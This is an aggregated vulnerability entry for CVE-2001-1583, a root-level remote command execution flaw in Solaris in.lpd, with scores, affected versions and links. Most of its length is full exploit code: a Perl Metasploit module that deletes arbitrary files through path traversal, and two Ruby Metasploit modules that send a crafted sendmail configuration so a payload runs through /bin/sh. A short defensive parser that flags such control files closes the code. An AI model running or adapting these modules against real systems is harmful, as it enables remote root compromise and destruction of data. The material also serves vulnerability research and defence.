CVE-2001-1583
CVSS 10.0
Published: 2001-12-31 00:00:00
Revised: 2010-06-24 00:00:00

[Original text] lpd daemon (in.lpd) in Solaris 8 and earlier allows remote attackers to execute arbitrary commands via a job request with a crafted control file that is not properly handled when lpd invokes a mail program. NOTE: this might be the same vulnerability as CVE-2000-1220.


[CNNVD] Solaris lpd Remote Arbitrary Command Execution Vulnerability (CNNVD-200112-257)

The print service daemon in.lpd shipped with Solaris provides the system's printing service.
Solaris in.lpd has a security flaw that allows a remote attacker to execute arbitrary commands on the server with superuser privileges.
An attacker can send a specially formatted control file and data file to the print service; when lpd invokes mail/sendmail to send a notification, the arbitrary command specified by the attacker is executed.
This vulnerability is very similar to the one described in NAI security advisory NAI-0020.
It has been reported that the attacker does not need a valid printer to exist on the victim host in order to carry out the attack.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.0
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:2.2
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:8.0:unkown:x86
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1583
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1583
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-257
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/7087
(UNKNOWN)  XF  solaris-lpd-sendmail-commands(7087)
http://www.securityfocus.com/bid/3274
(UNKNOWN)  BID  3274
http://www.osvdb.org/15131
(UNKNOWN)  OSVDB  15131
http://www.derkeiler.com/Mailing-Lists/securityfocus/incidents/2001-08/0490.html
(UNKNOWN)  SF-INCIDENTS  20010829 solaris lpd, KARMAPOLICE?
http://metasploit.com/projects/Framework/modules/exploits/solaris_lpd_exec.pm
(UNKNOWN)  MISC  http://metasploit.com/projects/Framework/modules/exploits/solaris_lpd_exec.pm
http://marc.info/?l=bugtraq&m=99929694701826&w=2
(UNKNOWN)  BUGTRAQ  20010831 Solaris LPD Exploit (fwd)

- Vulnerability information

Solaris lpd Remote Arbitrary Command Execution Vulnerability
Critical  Environmental condition error
2001-12-31 00:00:00 2007-10-03 00:00:00
Remote

- Advisories and patches

Vendor patches:
Sun
---
The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version:

http://sunsolve.sun.com/security

- Vulnerability information (1167)

Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit) (EDBID:1167)
solaris remote
2005-08-19 Verified
0 Optyx
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::solaris_lpd_unlink;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'		=> 'Solaris LPD Arbitrary File Delete',
	'Version'	=> '$Revision: 1.6 $',
	'Authors'	=>
	  [
		'H D Moore <hdm [at] metasploit.com>',
		'Optyx <optyx [at] uberhax0r.net>'
	  ],

	'Arch'		=> [ ],
	'OS'		=> [ 'solaris' ],

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The LPD server port', 515],
		'RPATH' => [1, 'DATA', 'The remote path name to delete'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module uses a vulnerability in the Solaris line printer daemon
	to delete arbitrary files on an affected system. This can be used to exploit
	the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
	or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. 
}),

	'Refs'  =>
	  [
		['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
	  ],

	'DefaultTarget' => 0,
	'Targets' => [['No Target Needed']],

	'Keys'  => ['lpd'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_path = $self->GetVar('RPATH');
	my $res;

	# We use one connection to configure the spool directory
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Send a job request that will trigger the cascade adaptor (thanks Dino!)
	$s->Send("\x02"."metasploit:framework\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our job request command");
		return;
	}

	# The job ID is squashed down to three decimal digits
	my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));

	# Create a simple control file...
	my $control = "Hmetasploit\nPr00t\n";

	# Theoretically, we could delete multiple files at once, however
	# the lp daemon will append garbage from memory to the path name
	# if we don't stick a null byte after the path. Unfortunately, this
	# null byte will prevent the parser from processing the other paths.
	$control .= "U".("../" x 10)."$target_path\x00\n";

	my $dataf = "http://metasploit.com/\n";

	$self->PrintLine("[*] Sending the malicious cascaded job request...");
	if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
		! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf)  ||
		0
	  ) { $s->Close; return }

	$self->PrintLine('');
	$self->PrintLine("[*] Successfully deleted $target_path >:-]");
	return;
}

sub SendFile {
	my $self = shift;
	my $sock = shift;
	my $type = shift;
	my $name = shift;
	my $data = shift;

	$sock->Send(chr($type) .length($data). " $name\n");
	my $res = $sock->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file command ($name)");
		return;
	}

	$sock->Send($data);
	$sock->Send("\x00");
	$res = $sock->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file data ($name)");
		return;
	}

	$self->PrintLine(sprintf("[*]     Uploaded %.4d bytes >> $name", length($data)));
	return 1;
}

1;

# milw0rm.com [2005-08-19]
		

- Vulnerability information (16322)

Solaris LPD Command Execution (EDBID:16322)
solaris remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: sendmail_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],
				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"

		# The job ID is squashed down to three decimal digits
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"


		# The mail configuration file
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"

		# Establish the first connection to the server
		sock1 = connect(false)

		# Request a cascaded job
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			print_status("The target did not accept our job request command")
			return
		end

		print_status("Configuring the spool directory...")
		if !(
				send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock1, 3, jid + "mail.cf", mailcf) and
				send_file(sock1, 3, jid + "script", payload.encoded)
			)
			sock1.close
			return
		end

		# Establish the second connection to the server
		sock2 = connect(false)

		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			print_status("The target did not accept our second job request command")
			return
		end

		print_status("Attempting to trigger the vulnerable call to the mail program...")
		if !(
				send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock2, 3, "dfa" + jid + "config", mailcf)
			)
			sock1.close
			sock2.close
			return
		end

		sock1.close
		sock2.close

		print_status("Waiting up to 60 seconds for the payload to execute...")
		select(nil,nil,nil,60)

		handler
	end

	def send_file(s, type, name, data='')

		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file command (#{name})")
			return
		end

		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file data (#{name})")
			return
		end

		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end

		

- Vulnerability information (21097)

Solaris 2.x/7.0/8 lpd Remote Command Execution Vulnerability (EDBID:21097)
solaris remote
2001-08-31 Verified
0 ron1n
N/A
source: http://www.securityfocus.com/bid/3274/info

The print protocol daemon, 'in.lpd' (or 'lpd'), shipped with Solaris may allow remote attackers to execute arbitrary commands on target hosts with superuser privileges.

The alleged vulnerability is not the buffer overflow discovered by ISS.

It has been reported that it is possible to execute commands on target hosts through lpd by manipulating the use of sendmail by the daemon.

If this vulnerability is successfully exploited, remote attackers can execute any command on the target host with superuser privileges.

This vulnerability is very similar to one mentioned in NAI advisory NAI-0020.

NOTE: It has been reported that a valid printer does NOT need to be configured to exploit this vulnerability.

http://www.exploit-db.com/sploits/21097.tar.gz

- Vulnerability information (F82322)

Solaris LPD Command Execution (PacketStormID:F82322)
2009-10-28 00:00:00
H D Moore,Dino A. Dai Zovi  metasploit.com
exploit,arbitrary
solaris
CVE-2001-1583

This Metasploit module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
					
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],

				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},	
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"
		
		# The job ID is squashed down to three decimal digits
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"
	  		

		# The mail configuration file
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
			
		# Establish the first connection to the server
		sock1 = connect(false)
		
		# Request a cascaded job
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			print_status("The target did not accept our job request command")
			return
		end
		
		print_status("Configuring the spool directory...")
		if !(
			send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
			send_file(sock1, 3, jid + "mail.cf", mailcf) and
			send_file(sock1, 3, jid + "script", payload.encoded)
		   )
		   	sock1.close
			return
		end
			
		# Establish the second connection to the server
		sock2 = connect(false)
		
		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			print_status("The target did not accept our second job request command")
			return
		end		
		
		print_status("Triggering the vulnerable call to the mail program...")
		if !(
			send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
			send_file(sock2, 3, "dfa" + jid + "config", mailcf)
		   )
		   	sock1.close
			sock2.close
			return
		end		
	
		sock1.close
		sock2.close
			
		print_status("Waiting up to 60 seconds for the payload to execute...")
		sleep(60)
		
		handler
	end

	def send_file(s, type, name, data='')
		
		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0] == ?\0)
			print_status("The target did not accept our control file command (#{name})")
			return
		end
		
		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0] == ?\0)
			print_status("The target did not accept our control file data (#{name})")
			return
		end	
		
		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end
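As an added defensive example (not code from this page, from Metasploit or from Sun), the following Python parses an RFC 1179 control file and flags the two anomalies the modules above depend on: a P (user name) field that is not a plain token, which in.lpd passes to the mail program (the "-C" configuration-file trick), and a U (unlink) field carrying a path separator or an embedded NUL byte (the arbitrary file delete). The three sample control files are constructed here to mirror the shapes shown in the modules; the job id and host names are made up.

```python
import re

# Constructed sample control files (not captured traffic). BENIGN_CF has the
# shape of a normal job; SENDMAIL_CF and UNLINK_CF mirror the crafted control
# files built by the modules above.
BENIGN_CF = "Hprinthost\nPalice\nJquarterly-report\nfdfA017printhost\nUdfA017printhost\n"
SENDMAIL_CF = ('Hmetasploit\n'
               'P\\"-C/var/spool/print/123abcdmail.cf\\" nobody\n'
               'fdfA123abcdconfig\nfdfA123abcdscript\n')
UNLINK_CF = "Hmetasploit\nPr00t\nU" + "../" * 10 + "etc/krb5.conf\x00\n"

# A user name that in.lpd hands to an external program should be one plain
# token: no leading "-", no quotes, no whitespace, no shell metacharacters.
PLAIN_TOKEN = re.compile(r"^[A-Za-z0-9._@-]+$")


def parse_control_file(text):
    """Split a control file into (command letter, operand) pairs.

    RFC 1179 control files are newline-terminated lines whose first byte is the
    command (H, P, J, f, U, ...) and whose remainder is the operand.
    """
    entries = []
    for line in text.split("\n"):
        if line:
            entries.append((line[0], line[1:]))
    return entries


def inspect_control_file(text):
    """Return a list of human-readable findings; an empty list is clean."""
    findings = []
    for cmd, operand in parse_control_file(text):
        if "\x00" in operand:
            # The Perl module relies on a NUL to stop the daemon appending
            # stray memory to the path; a NUL never belongs in a control file.
            findings.append(f"{cmd}: embedded NUL byte in operand")
            operand = operand.split("\x00", 1)[0]
        if cmd == "P":
            if operand.startswith("-") or not PLAIN_TOKEN.match(operand):
                findings.append(f"P: user name is not a plain token: {operand!r}")
        elif cmd == "U":
            # Unlink operands name spool-local df/cf files, never paths.
            if "/" in operand or operand.startswith(".."):
                findings.append(f"U: path in unlink target: {operand!r}")
    return findings


if __name__ == "__main__":
    for label, cf in (("benign", BENIGN_CF), ("sendmail", SENDMAIL_CF),
                      ("unlink", UNLINK_CF)):
        print(label, inspect_control_file(cf) or "clean")
```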

    

- Vulnerability information

15131
Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Solaris contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered when a specially crafted request is sent to the LPD daemon. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.

- Timeline

2001-08-31 Unknown
2001-08-31 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
